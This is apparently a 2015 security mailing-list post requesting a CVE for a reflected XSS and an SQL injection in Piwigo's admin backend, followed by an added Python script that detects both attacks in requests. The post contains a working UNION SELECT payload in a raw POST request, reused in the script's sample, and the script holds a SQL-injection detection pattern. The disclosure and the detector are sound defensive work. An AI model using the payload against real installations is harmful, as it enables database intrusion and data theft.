Date: Wed, 18 Feb 2015 16:38:35 +0100
From: Steffen Rösemann <>
Subject: CVE-Request -- Piwigo <= v. 2.7.3 -- Reflecting XSS- and
 SQLi-vulnerability in administrative backend

Hi Steve, Josh, vendors, list.

I found a reflecting XSS and a SQL injection vulnerability in the
administrative backend of Piwigo <= v. 2.7.3.

The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:




The SQL injection vulnerability can as well be found in the administrative
backend and can be found in the "History" functionality located here:


The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":


POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --

The issue has been fixed in version 2.7.4, released on 17th February 2015.

Can I have a CVE-ID for it?

Thank you very much.

Greetings from Germany.

Steffen Rösemann
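A defender-side check for the two admin.php issues reported above, added here as an example and not code from Piwigo or from the reporter: it parses a request's query string and form body, flags a "page" value outside an allowlist (the reflected XSS vector) and flags SQL syntax in the History search "user" field (the SQLi vector). The allowlist of admin page names and the SQL-indicator pattern are assumptions for this example.

```python
"""Request-inspection check for the Piwigo <= 2.7.3 admin.php report above.

Reports a "page" value outside an assumed allowlist of admin pages, and SQL
injection syntax in the History page's "user" filter. Not Piwigo's own code.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist of admin pages; a real deployment takes it from the app's router.
KNOWN_ADMIN_PAGES = {"intro", "history", "configuration", "photos_add", "users", "plugins"}

# Assumed SQL-injection indicators for a free-text "user" filter: quote and comment
# characters, a UNION SELECT, or a tautology/contradiction such as "AND 1=2".
SQLI_PATTERN = re.compile(
    r"(--|#|/\*|'|\"|\bunion\b\s+\bselect\b|\b(and|or)\b\s+\d+\s*=\s*\d+)", re.IGNORECASE
)


def inspect_admin_request(method: str, url: str, body: str = "") -> list[str]:
    """Return a list of findings for one request to Piwigo's admin.php."""
    findings = []
    parts = urlsplit(url)
    if not parts.path.endswith("/admin.php"):
        return findings
    query = parse_qs(parts.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True) if method.upper() == "POST" else {}

    # Reflected XSS vector: "page" is echoed back, so anything outside the allowlist is suspect.
    for page in query.get("page", []):
        if page not in KNOWN_ADMIN_PAGES:
            findings.append(f"unexpected page value: {page!r}")

    # SQLi vector: the History search form's "user" field reached the query unsanitised.
    if query.get("page") == ["history"]:
        for user in form.get("user", []):
            if SQLI_PATTERN.search(user):
                findings.append(f"SQL syntax in history 'user' filter: {user!r}")
    return findings


# Constructed sample requests; the POST mirrors the request body shown in the report.
if __name__ == "__main__":
    print(inspect_admin_request("GET", "/piwigo/admin.php?page=history%3Cb%3E"))
    print(inspect_admin_request(
        "POST", "/piwigo/admin.php?page=history",
        body="user=AND+1%3D2+UNION+SELECT+user()%2Cdatabase()%2C3%2Cversion()%2C5%2C6%2C7%2C8%2C9+--",
    ))
```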
